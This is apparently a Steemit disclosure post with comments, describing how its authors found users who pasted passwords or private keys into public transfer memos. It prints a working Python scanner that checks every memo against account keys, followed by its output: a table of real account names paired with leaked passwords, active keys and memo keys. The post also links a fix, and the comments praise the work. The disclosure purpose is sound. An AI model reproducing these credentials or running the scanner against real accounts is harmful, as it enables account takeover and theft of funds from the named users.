We just hacked 11 accounts on Steemit! ~$21 749 in STEEM and SBD is under our control. But we are good guys 😇 So...

in #steemit · 7 years ago (edited)

Actually, we - @noisy & @lukmarcus - have gained access to 9 passwords, 2 private active keys and 64 private memo keys, but first, TL;DR:

Image credits: https://null-byte.wonderhowto.com/news/study-for-white-hat-hacker-associate-certification-cwa-0165138/

# TL;DR

- No, we didn't hack the Steem blockchain.
- No, we didn't hack the steemit.com website or any other service built on top of Steem.
- We didn't steal those funds, despite the fact that we could easily have done so:
  - we changed the passwords of all compromised accounts;
  - we transferred all funds into the savings balance of each account (to show that we do not want to take them);
  - the problem is with the 2 accounts for which we only have active keys: a password cannot be changed without the old password or the owner key, so we made sure that those funds are safe in savings.
- **What we did was exploit a design flaw of the steemit website which led many users to make exactly the same fatal mistake:**

[screenshot: Selection_999(152).png]

# What actually happened?
<p dir="auto">Few days ago I noticed in my cousin's wallet, that he accidentally pasted his own password into wrong field (a memo field), when he made a transfer. I warned him, so he changed his password. But this got me thinking... if he could make such mistake, anyone could do that! And unfortunately I wasn't wrong :( <p dir="auto">So I wrote a script, which analyze all transfers in Steem history, which checked each memo, whether it is a match with current public keys of a user: <pre><code>import csv import pymssql import json from steembase.account import PrivateKey, PasswordKey from multiprocessing import Process, Queue, Manager WORKERS = 8 q = ''' SELECT TxTransfers.*, sender.owner sender_owner, sender.active sender_active, sender.posting sender_posting, sender.memo_key sender_memo_key, receiver.owner receiver_, receiver.active receiver_active, receiver.posting receiver_posting, receiver.memo_key receiver_memo_key FROM TxTransfers INNER JOIN Accounts as sender ON TxTransfers."from" = sender.name INNER JOIN Accounts as receiver ON TxTransfers."to" = receiver.name WHERE TxTransfers.type = 'transfer' AND TxTransfers.memo != ''; ''' def get_keys(field): return [key_auth[0] for key_auth in json.loads(field)['key_auths']] def get_public_keys_from_fields(public_keys_by_account, account_name, owner_field, active_field, posting_field, memo_key_field): if account_name not in public_keys_by_account: public_keys_by_account[account_name] = { 'owner': get_keys(owner_field), 'active': get_keys(active_field), 'posting': get_keys(posting_field), 'memo': [memo_key_field], } return public_keys_by_account[account_name] def get_public_key_from_password(shared_dict, account_name, password): if account_name + password not in shared_dict: shared_dict[account_name + password] = str( PasswordKey(account_name, password, 'owner').get_private_key().pubkey) return shared_dict[account_name + password] def get_public_key_from_private(shared_dict, priv_key): if priv_key not in shared_dict: 
shared_dict[priv_key] = str(PrivateKey(priv_key).pubkey) return shared_dict[priv_key] def worker( pid, transactions_queue, results_queue, public_keys_from_passwords, public_keys_from_private_keys ): print('[{}] worker started'.format(pid)) while not transactions_queue.empty(): i, account_name, public_keys, memo = transactions_queue.get() print('[{}][{}] Testing "{}" against "{}"'.format(i, pid, account_name, memo)) public_owner_key = get_public_key_from_password(public_keys_from_passwords, account_name, memo) if public_owner_key in public_keys['owner']: print("[{}] Gotcha! Found main password for '{}' account: {}".format(pid, account_name, memo)) results_queue.put((account_name, 'password', memo,)) else: try: some_public_key = get_public_key_from_private(public_keys_from_private_keys, memo) for role in ['posting', 'active', 'owner', 'memo']: for key in public_keys[role]: if key == some_public_key: print( "[{}] Gotcha! Found private {} key for '{}' account: {}".format( pid, role, account_name, memo ) ) results_queue.put((account_name, role, memo,)) except AssertionError: print('[{}] AssertionError: {}'.format(pid, memo)) continue except ValueError as e: if str(e) == 'Error loading Base58 object': continue elif str(e) == 'Odd-length string': continue print('[{}] worker ended'.format(pid)) def save_results(results_queue): tmp = set() with open('results.csv', 'w+') as file: writer = csv.writer(file, quotechar="\"", delimiter=";", escapechar="\\") writer.writerow(['account', 'type', 'memo']) while True: result = results_queue.get() if result == 'kill': break if result not in tmp: writer.writerow(result) file.flush() tmp.add(result) def main(): manager = Manager() existing_public_keys_by_account = {} public_keys_generated_from_potential_passwords = manager.dict() public_keys_generated_from_potential_private_keys = manager.dict() transactions = Queue() results = Queue() conn = pymssql.connect('sql.steemsql.com', 'steemit', 'steemit', 'DBSteem') cursor = conn.cursor() 
cursor.execute(q) with open('transactions.csv', 'w+') as file: writer = csv.writer(file, quotechar="\"", delimiter=";", escapechar="\\") writer.writerow(( 'id', 'tx_id', 'type', 'from', 'to', 'amount', 'amount_symbol', 'memo', 'request_id', 'timestamp', 'sender_owner', 'sender_active', 'sender_posting', 'sender_memo_key', 'receiver_owner', 'receiver_active', 'receiver_posting', 'receiver_memo_key') ) for row in cursor: print('.', end='') writer.writerow([str(item).replace('\r\n', '') for item in row]) with open('transactions.csv', 'r') as file: reader = csv.reader(file, quotechar="\"", delimiter=";", escapechar="\\") next(reader) # skipping the header for i, ( id_, tx_id, type_, from_, to_, amount, amount_symbol, memo, request_id, timestamp, sender_owner, sender_active, sender_posting, sender_memo_key, receiver_owner, receiver_active, receiver_posting, receiver_memo_key ) in enumerate(reader): sender_keys = get_public_keys_from_fields( existing_public_keys_by_account, from_, sender_owner, sender_active, sender_posting, sender_memo_key ) receiver_keys = get_public_keys_from_fields( existing_public_keys_by_account, to_, receiver_owner, receiver_active, receiver_posting, receiver_memo_key ) transactions.put((i, from_, sender_keys, memo)) transactions.put((i, to_, receiver_keys, memo)) processes = [] for i in range(WORKERS): p = Process(target=worker, args=( i, transactions, results, public_keys_generated_from_potential_passwords, public_keys_generated_from_potential_private_keys )) p.start() processes.append(p) listener = Process(target=save_results, args=(results,)) listener.start() for p in processes: p.join() results.put('kill') listener.join() print("end") if __name__ == '__main__': main() <h2>which returned: <div class="table-responsive"><table> <thead> <tr><th>account<th>type<th>memo <tbody> <tr><td>dunja<td>password<td>hurehurehure1234 <tr><td>anwen-meditates<td>password<td>P5Kk17eRvytzkRzzngp1CdVbQvRqFUq8wrvw8SqNdcZwXot2JRXA 
<tr><td>jakethedog<td>password<td>P5JEo9aSW6CAF6apUsMbxqSe6r991T5G35uXcoYMP1PmifBRqX87 <tr><td>miketr<td>password<td>P5JEZWqSV28XAGrwMXn5G2Sx4dADvS5mz4DrrtjoraY8nmB59Rrb <tr><td>blacktiger<td>password<td>P5HufQw3V442c4DREjUL4Ed4fQ41VzBhPtn5SkCBDJ25tuRFg1UC <tr><td>quetzal<td>password<td>P5KC2JAHPyuA5tBn4K8PxoLuwXqHx51GHy7tG3gD7DupKH8NxqZz <tr><td>tieuthuong<td>password<td>P5HybN5mguE6G2QB4BVKbreexEtxJD84veHcz4s3L9R8JLQ6m85V <tr><td>aubreyfox<td>password<td>P5J5wS2gkQBv3U6WPgHU9gUTitbWE4V5CKYeEhZGVa3VGgkzQU2p <tr><td>virtualgrowth<td>password<td>P5Kifqmdm38WPHpn2FUigLbhfD7FatHAHfcuRU5xSi16AFJFex3r <tr><td>trump<td>active<td>5KWkAdBieGJ8TwrpudKjJ3txTGKdjKSBHPgjiH1RGgFRWXp8uM9 <tr><td>amrsaeed<td>active<td>5JqaDeu2s3BsG9QYenpz2xjLfg3qdaeWhXduYNUSmK7KWAywx93 <tr><td>trump<td>memo<td>5KWkAdBieGJ8TwrpudKjJ3txTGKdjKSBHPgjiH1RGgFRWXp8uM9 <tr><td>alao<td>memo<td>5JBGwoooi1gEUXBhu6up1qWdsKKKG1TEakQwaBNMb95dup5f9xh <tr><td>athleteyoga<td>memo<td>5KU2dcxLpSCJZ4SB8eBqUJs2PCEuwfx7w2XYCUmcnLqgdHHqjq2 <tr><td>beeridiculous<td>memo<td>5KHkKyHpxDBuuKGt5QwTbb42bxmMUo1Xk9efBKU7wUoRed2Ak8z <tr><td>romanskv<td>memo<td>5JzZ1BUHGrYrmu9Kms5mFK2nhQPFSxKHXp5mtcfMrQWioEgJTfE <tr><td>blockiechain<td>memo<td>5JJZPu2z6DfhyGFsm9b458wff8H168f4yiAidbsWq55YSbFLd3a <tr><td>bloodhound<td>memo<td>5JQZo8QDuQ1eDqsgMnVHg1ujqYNUTEDV4KYZyeSdbzSAbXMsSuV <tr><td>bryguy<td>memo<td>5JdJHDcgeqyaHEgmyTbob221RUvttqyRVVPViAMzuq4hWJKw6sa <tr><td>churchsoftware<td>memo<td>5KB3B3rHxvvaR3C2gfNyKkkReqdfbsjPs4AZ8ceiiR4B49oCDmJ <tr><td>chuckles<td>memo<td>5KWf41ixGbPMpAxNhe47jtTVbyAi9Su4mZrHaVanYP2rQWoPUUk <tr><td>coincravings<td>memo<td>5Jp6RJ71B824qc2cHXLPNYHZPD1BgxE2rFMyEpDszjqussW5iSA <tr><td>colombiana<td>memo<td>5JaewDd6gw4AjXGhABCdZk2FHrwxHJnJDWZmkUzJYuny6rarbf3 <tr><td>cryptoeasy<td>memo<td>5JNv71NgwCRUDAQu1NP67TDRVHKmRnnGLRfNFMwAKS8fTMLvLkQ <tr><td>datkrazykid<td>memo<td>5JbiRrFrv9GLMjjPYZA8K7AWxAXQThs5AefWj1JgqjzMS2jLdng <tr><td>dollarvigilante<td>memo<td>5Hqzx26rSmSJ2o5VB8gicf3F2Q6BU35n1nMNajcEmDxMietvUVx 
<tr><td>dethie<td>memo<td>5K3BBi9pETRGG7KkS7VDrWY7exDCCi315prn2Mf9dTuR9vCejEH <tr><td>francoisstrydom<td>memo<td>5Jkw1HdHc1ucwTosaqhXVAhyG848d1ZJprQsrwP1UEctazBvU3D <tr><td>farinspace<td>memo<td>5JMckr9WkVbRZdbeMwQ6CNwTWBfrp4vTBy9K1YTJyZ76XBbRgZW <tr><td>golgappas<td>memo<td>5K8zaCwcXWjQPjs6JGH896pGb6jENyMNU19g1hSsYXW1X2Dour1 <tr><td>goldrush<td>memo<td>5JKCSn4xwHHCTBNy1MYJgbLDpYGR434A43gUvGPCVJPAs49GMvX <tr><td>hithere<td>memo<td>5HxdErB3wPUDQKWEcjNBBWLpB1uJ8aMrY1tK5ZA1k56MqmTtT31 <tr><td>iaco<td>memo<td>5JTYW5HfPJJX47VRT1Cq9Nz8aSruWKhETiD6oo9GPJNteQ5RPke <tr><td>inphinitbit<td>memo<td>5J9uWL39vDYgEosscgxEziYQ2ybPbxM5e9sPkzTxgqTgNYC7Mx7 <tr><td>jellos<td>memo<td>5JYXarzjE5afBtHcjhvdUcczrqCsfUEyxVRTKAFyDdjGatkTNNy <tr><td>kakradetome<td>memo<td>5JuMh7FikJ1UVpUauF3J1e7MHj562z8Zmnp29pauVgPw3A4SgYC <tr><td>kingofdew<td>memo<td>5HrSQ9yJizKCbDAu2Di9PnSuMPwMuNQCiKRdBUqzHFZySWQmtbL <tr><td>malyshew1973<td>memo<td>5KbD93C9XLGL4Aa4ncSpRnXCVuSRTvRRP6gANwHPbUeWBaPf4Eq <tr><td>leesmoketree<td>memo<td>5Kctn9BvtxB3CXzzX4GMcmLygq42LqisCZr5MAy7VYPzvwX5o7u <tr><td>lichtblick<td>memo<td>5J9jkRijjAn8o8DXt8R1ujSZHtahevVCw8CGzPEjnvCEsqkXjHy <tr><td>lopezro<td>memo<td>5K6rmYGbHaGsAyGLpQMNupWcmjQFHvjX2GtYyCrC3KMgWAWcNci <tr><td>lostnuggett<td>memo<td>5JEKwfrtSEFvw8P8qnWyDhfxnQTRB5Vn2WxwW3tE4gL4pZiwPcQ <tr><td>luani<td>memo<td>5Jo7p98JCpTiH1q9kVC81etym4QSHRRpLDvxumRW7BXouDu8Yfd <tr><td>mama-c<td>memo<td>5HqAhZBvbBJKVWJ1tsrg7xnS1dvNNyxBoHzp8Snvp9C6Uawx66x <tr><td>marionjoe<td>memo<td>5KUpMmkx6hrPanwKzUvrHTonLDQkZAoiJwESogHAMSeuFsB1Lqc <tr><td>maxfuchs<td>memo<td>5J9CvSGNyLBgUwhKtsTWCqTddbDZJ4tFrVSyWFzDstsQiG9spPe <tr><td>mkultra87f<td>memo<td>5J8mDeubzJwEtHsbPzfUCVetNgPrVgQVHUBQDySH7v1qSS44DBf <tr><td>mrsgreen<td>memo<td>5JyAaFEdEriRLpQ9uEXGoeNyHpw1TscqN6VP6iNjpoFbA8JCrMP <tr><td>nathanhollis<td>memo<td>5Kk1N4nxMPbqVuJCVt3MUjz5dvJR716cUAdf6c3kToqzMqT8rRu <tr><td>murat<td>memo<td>5K8R2J7xiLRN3HWdAy5Zym4taE74o9DWF8FV82HHFrqNUZDzdxW 
<tr><td>nikolad<td>memo<td>5KdeDUj92w2HXsLH6V6SpNGPAeyBtJEU5jVoqZyjaHDkE39AkzF <tr><td>niliano<td>memo<td>5KCPgZBnLziZC88e44j8GxK11XYdpQyo8WFxocBH24jAhEnVN6z <tr><td>norbu<td>memo<td>5J5HyEwx54MwKW8gpsSBzvwAweHRjH11CXs85RCNWSooyPYRaeh <tr><td>onighost<td>memo<td>5HwsjHgWMmJSLdiVgdxbRWqyvFtsKRC3Mk2tDzkpW4293ssTa6V <tr><td>pinkisland<td>memo<td>5JAymGCYWxhojoyQsfAC4x619nq5vkcQBhMWjEZHwiitodBYFV5 <tr><td>rawmeen<td>memo<td>5JnLMoPRry2n361tPxQq7MYy16tn5PuT2PmsP1FLrRGJsp1Vfem <tr><td>qamarpinkpanda<td>memo<td>5K4SgN4tps3HRiyy49m5rfWNCZmyBVYv7eFF3CTRkcJJPQsExTb <tr><td>richarddean<td>memo<td>5JPPUidz7rPN6VPHFJQbjnh8a3JQCDzP7fJSt93EQkUeLr3gmJJ <tr><td>saramiller<td>memo<td>5K8My6Afbi6ff5CeFByB5e9zQG4QUX4MtMRHs7Ux9Tvu4ZSP7H4 <tr><td>slimjim<td>memo<td>5HtkqVNSBj4kf6tyyyNPBgpnbgkrvATM1wBYY4mkNfxs9xiYHbv <tr><td>smisi<td>memo<td>5Hsre3qaCDBcxwGiig5qFc65dwf2NfAssUUTXfCWFmbhbxPz7bL <tr><td>sraseef<td>memo<td>5K558SavQVHXnKn6k8CoKe28T3FAmmAtRJuCMjpwdSwR6sT9rYq <tr><td>steemshop<td>memo<td>5JRoiSJw18Vj3rGt5mrd4JeuxL1Wb1YpGyFDQu9pFrKmckr6kTu <tr><td>surpriseattack<td>memo<td>5K8Be3nW33Lc5vqRUJx3xmoLFnMMmJPMthYHb16i7R2gwFTJqh3 <tr><td>tee-em<td>memo<td>5KPT9Nhtho3qaAFkGQ4zqy7Dae1729WdYM5wL3UPyKVuTauonif <tr><td>theofphotography<td>memo<td>5KRJ9qt8E9o6KXFhfyW7PJH7sDsmSBVaBeC8SmLR5LmReQii44Y <tr><td>thunderberry<td>memo<td>5JxtXr2cMTkbU37CDtPyFdGuTT9fPceNemwnJDsqAdMoV5msLEP <tr><td>tomino<td>memo<td>5JPBiMwfrqTdgZhW16LjdeMZv29gtKQC4eb4jyVTpk2Vvx5MHde <tr><td>worldclassplayer<td>memo<td>5JQBm8pn5vwChYdoxx3tJw6dkBFeQpKBKia5roB9DqXZMoFdF4h <tr><td>writemore<td>memo<td>5JJTZpTEvw4C7cnU7Q9NfzUnXSYqwYLLxkP7B3c39Z82Uwzj14d <tr><td>wthomas<td>memo<td>5HwbsX4CTKtCJLH8QYuVBTvCbJYQwwFDiCCKy99uNLCHpoazo6N <tr><td>walcot<td>memo<td>5KJjeTJGM8FjjDpj8mHRFpjae5SeSZ9Y8CGaBJC7VqFUGR25Qa6 <tr><td>vovaha<td>memo<td>5J9Wxf1Xz1hXvMd7ubXHNZXhFoF1yhQT3GSHNVmRNXERCnBZJ7e <h1>The fix <p dir="auto">I created and submitted a fix, to prevent such mistakes in a future: <p dir="auto"><span><a 
href="https://github.com/steemit/condenser/pull/1464" target="_blank" rel="noreferrer noopener" title="This link will take you away from hive.blog" class="external_link">https://github.com/steemit/condenser/pull/1464 <p dir="auto"><img src="https://images.hive.blog/768x0/https://steemitimages.com/DQmT3M7PGgQACJfESby7nFSjAZTsP72ovsJvsYCYon62QTa/Selection_999(154).png" alt="Selection_999(154).png" srcset="https://images.hive.blog/768x0/https://steemitimages.com/DQmT3M7PGgQACJfESby7nFSjAZTsP72ovsJvsYCYon62QTa/Selection_999(154).png 1x, https://images.hive.blog/1536x0/https://steemitimages.com/DQmT3M7PGgQACJfESby7nFSjAZTsP72ovsJvsYCYon62QTa/Selection_999(154).png 2x" /> <h1>FAQ: <h2>My Account was hacked - what I should do? <p dir="auto">Actually, I cannot reach you on steemit.chat or discord to give you your new generated password. Why is that? Because no one can have a certainty, that you actually have the same login on different service. I do not want to risk giving access to your account to someone who just pretend to be you. 
<p dir="auto"><span>You should go to: <a href="https://steemit.com/recover_account_step_1" target="_blank" rel="noreferrer noopener" title="This link will take you away from hive.blog" class="external_link">https://steemit.com/recover_account_step_1 <p dir="auto"><img src="https://images.hive.blog/768x0/https://steemitimages.com/DQmYZ3qNcsT5j6UKdxDorFPpz5z9XKSe1rTjXtXdqERDnSo/Selection_999(155).png" alt="Selection_999(155).png" srcset="https://images.hive.blog/768x0/https://steemitimages.com/DQmYZ3qNcsT5j6UKdxDorFPpz5z9XKSe1rTjXtXdqERDnSo/Selection_999(155).png 1x, https://images.hive.blog/1536x0/https://steemitimages.com/DQmYZ3qNcsT5j6UKdxDorFPpz5z9XKSe1rTjXtXdqERDnSo/Selection_999(155).png 2x" /> <p dir="auto"><img src="https://images.hive.blog/768x0/https://steemitimages.com/DQmY7Xd4G1wAmxrVb1rR1m6dhKE9u54tc3mnZE5X4dA7sC7/Selection_999(156).png" alt="Selection_999(156).png" srcset="https://images.hive.blog/768x0/https://steemitimages.com/DQmY7Xd4G1wAmxrVb1rR1m6dhKE9u54tc3mnZE5X4dA7sC7/Selection_999(156).png 1x, https://images.hive.blog/1536x0/https://steemitimages.com/DQmY7Xd4G1wAmxrVb1rR1m6dhKE9u54tc3mnZE5X4dA7sC7/Selection_999(156).png 2x" /> <p dir="auto">and you will be able to restore access to your account with a help of steemit and your email address. <h3>Important <p dir="auto"><center><strong>According to code in Steem blockchain, you can do that only during first 30 days after password was changed. <h2>My account is on a list, but <em>only private memo key was exposed. What should I do? <p dir="auto">You should change your password immediately. <p dir="auto">You can do that on: <code>https://steemit.com/@<your_login>/password <p dir="auto">Right now (according to my knowledge) exposed memo key do not make a damage, but it was said few times, that those private keys in the future might be be used to encrypt private messages. Exposed private memo key would mean, that anyone could read your private messages. You don't want that, right? <h1>What next? 
<p dir="auto">You can expect from me in very near future few posts about security (for total newbies and for developers): <ul> <li>How private and public keys works. What is the difference between password and a private key <li>Why Steemit didn't detect that I checked passwords of 183388 users <li>Very detail explanation of how passwords are stored by steemit in your browser, and why it is secure <li>How to set own password, which is not generated by Steemit <li>How to make you account on Steemit more secure, by using only private posting key for every-day use <p dir="auto">Make sure, you follow <a href="http://steemit.com/@noisy" target="_blank" rel="noreferrer noopener" title="This link will take you away from hive.blog" class="external_link">me, to learn more about how to keep your fortune earned on Steemit more secure :)

Nice work, noisy! With community heroes like you and @lukmarcus, we are continually becoming stronger than ever

Would be great if you could have someone acknowledge these github issues...
https://github.com/steemit/condenser/issues/1459

Would also be good if we could get some sort of 2FA option on the wallet.

Not sure. I haven't really tried hardware wallets yet but it is something I need to look into.

2FA is essential in this space... I agree

2FA cannot be created for a blockchain-based system. There would have to be email/SMS on the blockchain.

OK - is there some other solution you can think of?

Users should never use their password on Steemit. They should use only the private posting key. I am writing an article about that as we speak...

Yes for sure but is there any other way to increase security?

It is not secure yet. An account can be hacked.

Spotted this a month ago but thought a post would be sufficient to get the word out. I am not so techy, so my post is mostly my voice. Steemit is letting me peer into more and more things! I have started to learn some coding fundamentals. I gave my novice tip as possible fixes within my post, hoping it helps! https://steemit.com/steemit/@surpassinggoogle/this-could-be-the-easiest-way-to-lose-your-steemit-account-or-password-and-possible-fix-steemit-inc-take-a-look

We are just trying to walk a German blogger through the recovery, who "lost" his account in this (amazing and useful) hack. Unfortunately it isn't possible to recover an account via Facebook. What is the alternative? Can there be a fix?

@noisy @ned

THX

which account?


@miketr Seems @Twinner already talked to you and mike can post and vote again... THX!

💖💖💖💖 💖💖💖💖

No doubt. loool I love this meme btw

I wish more people understood the value of a good meme

Memes get undervalued by people... so sad. I made a post about memes in fact

I agree ;) See if those minds can come up with a solution to a problem that WE ARE ALL ABOUT TO FACE involving capital gains tax. I'd love to see a clever workaround/strategy for the problem below:

Need some critical thinkers. https://steemit.com/money/@threat08/avoiding-capital-gains-tax-15-avg-when-cashing-out-your-bitcoin-into-fiat-theoretically-of-course

I hate taxes

@noisy & @lukmarcus You guys are awesome!!

Thanks!

Wao this is quite interesting

Thanks, for your efforts!

Detecting these things early, and prevent future events will grow the trust in this platform!!!

couldn't agree more!

Go STEEM! ;) The way you handle things like this is awesome, thanks for the platform and some freedom, guys!


Good job idd! Last month I wrote a request for the programmers in the Steemit community: https://steemit.com/hardwarewallet/@michiel/hardware-wallets-new-and-incredible-interesting-devices-idea-for-steemit

I am not a coder, so I can only spread the idea. Hope someone will pick it up and create the possibility to secure a Steemit account 100%.

Yes, this great work for the community!!

I'm amazed at how smart our community is. This is unreal!!

i think yes

I love the way steemit is doing things!

We have to be diligent, both personally and as a community.

Thanks for your great work @noisy and @lukmarcus! Much thanks for helping everyone know how to do Steemit life a little better and safer.

Great job. Glad it was a white hatter that got his hands on this first! You're a good person and I'm sure some people will be happy you won't be taking their funds!

Yea, this guy does not have a standard heartbeat :)

Thank you for being ethical and responsible in this case.

BTW, I don't think that this is a "flaw in design of steemit website".

There's already "This Memo is Public" note there.

This is rather a Problem Between Keyboard and Computer type of bug. You can't prevent users from hurting themselves. If one note didn't help everyone, adding a second and a third would probably reduce the risk a bit, but there would still be those who would ignore it.

Anyway, good work.

Technically you are right, but I still believe that if so many users are making exactly the same mistake... something is wrong. Guys like @dollarvigilante (the guy who has the biggest number of followers on Steemit) exposed his private memo key; @virtualgrowth and my cousin @lukmarcus accidentally exposed their own passwords. Those guys are experts on Steem and Steemit when you compare them to the average Joe.

I believe that we can do things a little bit better; that's why I provided a pull request with a fix :)

I didn't... I haven't been hacked.

There are 4 pairs of keys: active, owner, posting and memo. Every pair has a public key and a private key. Under no circumstances should you ever expose any of your private keys.

As I wrote in the post, right now exposing a private memo key is not very dangerous. But it has been said a few times that in the future memo keys will be used to encrypt and decrypt private messages. So basically every conversation of yours encrypted with your memo key would be public for everyone who possesses your private memo key.

Also... even right now everyone with your private memo key could try to do some kind of social engineering attack by pretending that the attacker is you (because technically speaking only you should be able to sign messages with your private key).

So... no, your account was not hacked right now, but with the private memo key exposed, your account could be attacked the moment private memo keys gain some new role in the Steem ecosystem.

I see, ok thanks!

Jeff, take a break from walking your dogs and set up your avatar. Por favor.

Ouch, you could've mentioned that in your live show yesterday!
It took a whole day to get account access.
Anyways, cheers!

Thanks so much for explaining the ramifications. I'll make sure to be extra vigilant when I do transfers. This is something I can see myself accidentally doing, and I'd rather avoid the headache.

You did Steemit a massive favor Noisy! It won't be forgotten! :)

But great work! I also once almost pasted it in the wrong place in a moment of my ADHD inattention. Good that I'm not on the list :-)

When you scroll through the names looking for yours....


same :D

lmfao! this so me right now.

haha I was definitely doing this

Haha, did the same even though I'm a new user with nothing much to lose unfortunately ^^

It may be an error 40, but it still should be easy for the steemit website to check if the memo contains an account key (or what is likely one) and give an error message for that.

Why keep an error source open just because YOU would never make that error (which of course at least 50% of those who make it say).

Sure, I'm not saying that we shouldn't try to reduce those chances. Appropriate modification is on its way.

Steem Super Hero. Please @noisy be at Lisbon's Steemfest, I want to shake your hand if I could make it there 😊......

Thank you Noisy. Great work.

Amazing work! :) best type of hacking, as you can keep the rewards with a clean conscience and gain people's trust and respect! :) well done :) followed and upvoted for the hard work!

Krzysztof love your use of ethical hacking here to help fix a bug and thank you for sharing the accounts to help us know if we need to change our passwords now!

Well done and thank you for being ethical about this, it's a miracle nobody else beat you to it and stole the funds. @dollarvigilante should be especially grateful, this could've been way worse.

Wonder what dollarvigilante's reaction to this is gonna be... priceless.

I haven't been hacked, that's my response.

Hahhaha...and still remains your response.

My question indeed!

Just curious, why call out to dollarvigilante??

Thanks for alerting us to this common mistake. Can see a newbie like me making it if you hadn't warned.

Hopefully the reward you get from this post will be big :) Hackers better think long term, joining the good guy side pays off more IF you know how to do it right.

We, as a community have all the power we need to make sure the good guys are properly rewarded. I threw my vote on this article and plan to resteem it.

It would be really nice if the wallet gave a newbie explanation by each "key" in the wallet. I am confused by the current messages. I lean towards being afraid to give any key to anyone, but I totally see where the confusion comes in.

Thanks for pointing out the possible mistake that we could make. I'm new to Steemit and this post is really useful to me and reminds me not to make the same mistake. Thanks again!

Yeah, I figured something like this could happen. I usually copy some random text after I log in to Steemit so the password is not in the clipboard anymore, and thus can't be pasted somewhere by mistake.

The problem is... that if you are making a transfer, very often you are prompted one more time for the password (because the password is actually not saved if you move to a page outside of the wallet).

Yes, you are right. I need to be extra careful when I do transfers. Thanks! Hopefully Steemit may find a way to make this better. Maybe by adding some PIN number or something, that is not used to login, but only for transfers, and make it not work unless you are already logged in to Steemit (PIN would not be blockchain based). Or something.

Nicely done @noisy! I'm wondering, if there were someone else instead of you, what would he have done? Thanks for sharing this, and maybe those people have learned their lesson!

Well done on this. I'm going to promote this a little, it's important

I resteemed to help some too.

Omg, really thanks for your work done. What you really did is a great job, it's ethical hacking! Hope the steemit team will really treat it seriously and amend the code accordingly to solve the problem. Thanks for your great job guys!

Nice work keeping people safe and secure. We need more benevolent "hackers" like you in this world.

Whitehats: Protecting people from themselves since 1970-01-01T00:00:00Z

And doing it till 2069-12-32 23:59:59!

lool. Someone has a time machine

"All the way to...the year 2000"

hahah yeah... the official version looks good.

Haha, you got the DollarVigilante. He better send you a gift basket this Christmas, I would think his account is LARGE!

He didn't actually... I haven't been hacked. I am waiting to hear his response.

Good to hear, I appreciate the White Hats doing their testing though!

Upvoted


Thanks for your great work!
Your efforts make our community more secure and stronger. @noisy & @lukmarcus

And I also wrote an article about it for Chinese users.

🔓 [Security Alert] You may leak your steemit password (key) by accident / Security alert: you may have inadvertently leaked your steemit password

This is amazing to see how you did this, highlighting the mistakes made on steemit. Maybe steemit should add detection of a private key in the memo?

we are merging the PRs now :)

It's clear this mistake can be made way too easily, even by those who are generally more careful and/or experienced (cough cough). So I'm glad to hear noisy's fix is in progress. Although in the future (hopefully not too distant), it would be great if memos were private!

Is there a plan for things like what a "will" might include... for lost credits? I.e., if someone dies or goes bye-bye, where and how can we transfer bitcoins to our next gen? Or in this case steem.

before I went public with this, I already prepared a fix which is doing exactly this ;)

https://github.com/steemit/condenser/pull/1464

Damn noisy, you deserve all the respect!

WoW, this topic woke me up better than any Cuban cup of coffee could.
Thanks for posting!

I got excited and nervous when I saw the title. As a newbie, I am still learning how to ensure that my account is secure. Thanks so much for sharing this information. Everyone should be aware of this. This post is so important. How can this post get more publicity? That is one feature of Steemit that I still wonder about. Was surprised to see Dollar Vigilante on the list. Just goes to show anyone can make an error. Thanks so much. Upvoted and resteemed

Thankfully I and my followers are not on that list. Awesome work! Don't know that those who have to change passwords will agree, but better you than someone else IMHO. Upvoted Resteemed :)
Have a great day.

This reminds me of how annoying it is when I accidentally paste a password into a google search or something stupid like that.

I then have to go through the process of changing that accounts password to recover from my error.

Easy mistakes to make.

Wow...grateful you're using your powers for good and not evil! That's not a list I want to be on; thankfully only my private key was exposed, and super duper thankfully you seem to be an honorable gent. Excellent example to bring awareness to cyber security and more importantly to decent human values 👏 👏 👏

Thank you for looking out for the community. This could happen to anyone. But luckily there was a good (and skillful) person there to help.

White Hats off to you!!!!

Good job.

Sterling work, chaps!! That's community for you. I applaud you and am sending 10% of my steem dollars to you in thanks on behalf of the community. That's a very useful service and great to know steemit has its own warlocks to keep out the wolves!!

Thank you, it's really great that you caught this, created a solution and shared. I'm new and am a lot more clear on the importance of security from your post. Upvoted and following you to learn more...

@noisy WOW great work man! First off, your due diligence on this matter is extremely commendable and I think, on behalf of all Steemians, seeing this not only makes us wary, but now educated on what's really going on. Thank you for this.

Have you spoken to anyone in the administration of Steemit regarding this matter?

Thanks! Upvoted, reblogged and now I will follow!

-@bostonrob

Excellent work, thanks for pointing this out.

This was pretty evil genius of you.

Thank you so much @noisy & @lukmarcus for your honest work! Had me a little nervous there for a second!

You are a really good and clever guy! I just informed two known accounts to read your post.

great work and great ethical and responsible actions.

Damn noisy this is smart and generous at the same time

Great work brother
UPVOTED

heroes!!!!

Nice catch!

Wow, thanks for finding this potentially devastating "bug"!!! Good job @noisy!

I like your code, fellow python programmer! lol.. People, don't put the priv key in your memo.... lol

Would love my own password, not a generated one.

Unfortunately, I ran into a few people that feel the same way except they are pointing to that being their reason to not join us. They just don't get the fact that we are dealing with real money here, money that can be stolen and never returned.

Exactly, I think they should protect their money for sure. My comment got all messed up somehow and I had to edit it again, I guess you cannot say anything about yo + ur Pa = +as word lol. I had to type it out weird to get around a filter I guess? hmm.

Anyways, if they just made you pick a password with at least 20 characters, 1 capital, 1 lowercase, 1 special symbol, 1 number, and no more than 3 repeating nums/chars/symbols, I think that would be fine. I feel like someone is more likely to hack my computer and steal my password for steem than they are to guess my password. Not to mention I have to write it down and also have multiple copies somewhere.

I completely agree. I have it written down, a photo printed out too so I don't mess up when writing it down, and other archaic methods of 'securing' my Steemit account.

Thanks for the warning.. following you!

I hope all is well with @virtualgrowth. I like that guy! A sobering read I have to say!


Wow! Nice job, @noisy! I would never have thought of that. I can't help but wonder if those who did it looked at that memo and thought "Oh crap. I hope no one ever sees that."

Great, you remind me to be more careful. Thank you! :)

Nice work! I resteemed this post so as to raise the awareness of this issue!
